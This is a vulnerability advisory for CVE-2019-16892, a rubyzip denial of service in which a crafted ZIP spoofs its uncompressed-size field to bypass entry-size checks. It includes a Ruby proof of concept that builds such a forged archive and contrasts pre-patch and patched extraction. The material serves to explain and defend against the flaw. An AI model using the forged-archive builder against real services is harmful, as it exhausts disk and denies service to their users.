
CVE-2019-16892: Rubyzip denial of service

CVSS Score
5.5 (CVSS v3.1)

Basic Information

EPSS Score
0.46412%
Published
9/30/2019
Updated
11/17/2023
KEV Status
No
Technology
Ruby

Technical Details

CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
Package Name   Ecosystem   Vulnerable Versions   First Patched Version
rubyzip        rubygems    < 1.3.0               1.3.0

Vulnerability Intelligence
Miggo AI Root Cause Analysis

The vulnerability stems from missing validation during ZIP entry extraction. Before 1.3.0, the extraction flow (Zip::Entry#create_file, reached through extract) trusted the uncompressed-size field carried in the archive headers, a value the attacker controls. An application that checked entry sizes before extracting could therefore approve an entry declared as a few bytes and still have the library inflate and write far more, consuming disk until the partition fills. The 1.3.0 patch tracks the number of bytes actually written in create_file and introduces the validate_entry_sizes flag; with the flag set, extraction raises as soon as the written byte count exceeds the declared size. The test added in file_extract_test.rb demonstrates an entry whose inflated data is larger than its forged size field.
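The mechanism above, as an added Ruby example that is not rubyzip's own code. It uses only the standard library (zlib, stringio): a minimal single-entry ZIP writer whose uncompressed-size field can be forged, a local-header parser, and an extractor that runs either with the pre-1.3.0 behaviour (trust the header) or with a check modelled on the 1.3.0 create_file fix (count bytes written, raise when they exceed the declared size). The names CHUNK, EntrySizeError, build_zip, read_entry, extract and safe_extract are this example's own, and the 1024-byte chunk size stands in for whatever buffer the real library uses.

```ruby
require 'zlib'
require 'stringio'

# Added example, not rubyzip code. CHUNK is an assumed read size.
CHUNK = 1024

class EntrySizeError < StandardError; end

# Build a ZIP archive: local file header, raw-deflated data, central directory
# entry and end-of-central-directory record. `claimed_size` is written into the
# uncompressed-size fields; an honest archive passes data.bytesize.
def build_zip(name, data, claimed_size)
  deflater = Zlib::Deflate.new(Zlib::DEFAULT_COMPRESSION, -Zlib::MAX_WBITS) # raw deflate (ZIP method 8)
  raw = deflater.deflate(data, Zlib::FINISH)
  deflater.close
  crc = Zlib.crc32(data)
  local = [0x04034b50, 20, 0, 8, 0, 0, crc, raw.bytesize, claimed_size,
           name.bytesize, 0].pack('VvvvvvVVVvv') + name + raw
  central = [0x02014b50, 20, 20, 0, 8, 0, 0, crc, raw.bytesize, claimed_size,
             name.bytesize, 0, 0, 0, 0, 0, 0].pack('VvvvvvvVVVvvvvvVV') + name
  eocd = [0x06054b50, 0, 0, 1, 1, central.bytesize, local.bytesize, 0].pack('VvvvvVVv')
  local + central + eocd
end

# Parse the local file header the way an extractor does. `size` is the
# attacker-controlled uncompressed-size field that pre-1.3.0 code trusted.
def read_entry(zip)
  io = StringIO.new(zip)
  f = io.read(30).unpack('VvvvvvVVVvv')
  raise 'not a local file header' unless f[0] == 0x04034b50
  name = io.read(f[9])
  io.read(f[10]) # extra field, ignored here
  { name: name, method: f[3], compressed_size: f[7], size: f[8], data_offset: io.pos }
end

# Inflate the entry into `sink`, returning the number of bytes written.
# validate: false  -> pre-1.3.0 flow: whatever the stream produces is written.
# validate: true   -> mirrors the 1.3.0 create_file fix: count bytes written
#                     and raise once they exceed the declared size.
def extract(zip, entry, sink, validate:)
  raise "unsupported compression method #{entry[:method]}" unless entry[:method] == 8
  io = StringIO.new(zip)
  io.seek(entry[:data_offset])
  inflater = Zlib::Inflate.new(-Zlib::MAX_WBITS)
  remaining = entry[:compressed_size]
  bytes_written = 0
  while remaining > 0
    slice = io.read([CHUNK, remaining].min)
    remaining -= slice.bytesize
    out = inflater.inflate(slice)
    sink << out
    bytes_written += out.bytesize
    if validate && bytes_written > entry[:size]
      raise EntrySizeError, "entry '#{entry[:name]}' should be #{entry[:size]}B, but is larger when inflated."
    end
  end
  tail = inflater.finish
  sink << tail
  bytes_written += tail.bytesize
  inflater.close
  bytes_written
end

# The application-side guard the CVE describes bypassing: reject the entry if
# its declared size exceeds the quota, then extract. Returns bytes written.
def safe_extract(zip, quota:, validate:)
  entry = read_entry(zip)
  raise "declared size #{entry[:size]}B exceeds quota #{quota}B" if entry[:size] > quota
  extract(zip, entry, StringIO.new, validate: validate)
end

if __FILE__ == $PROGRAM_NAME
  # Constructed input: 200,000 bytes that deflate to a few hundred, declared as 100 bytes.
  bomb = build_zip('a.txt', 'A' * 200_000, 100)
  puts "pre-patch: wrote #{safe_extract(bomb, quota: 1_000, validate: false)} bytes past a 1000B quota"
  begin
    safe_extract(bomb, quota: 1_000, validate: true)
  rescue EntrySizeError => e
    puts "patched: #{e.message}"
  end
end
```

The quota check passes in both runs because the only size an application can inspect before extraction is the forged header field; the oversize write can only be stopped while inflating, which is where the 1.3.0 fix puts it. Two caveats carry over from upstream: the check runs after each chunk has been written, so it bounds the overrun to one inflated chunk rather than preventing it, and in rubyzip 1.3.0 validate_entry_sizes defaults to false, which only emits a warning; an application on 1.3.x must set Zip.validate_entry_sizes = true to get the raise (rubyzip 2.0.0 made true the default).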


WAF Protection Rules

WAF Rule

In Rubyzip before 1.3.0, a crafted ZIP file can bypass application checks on ZIP entry sizes because data about the uncompressed size can be spoofed. This allows attackers to cause a denial of service (disk consumption).
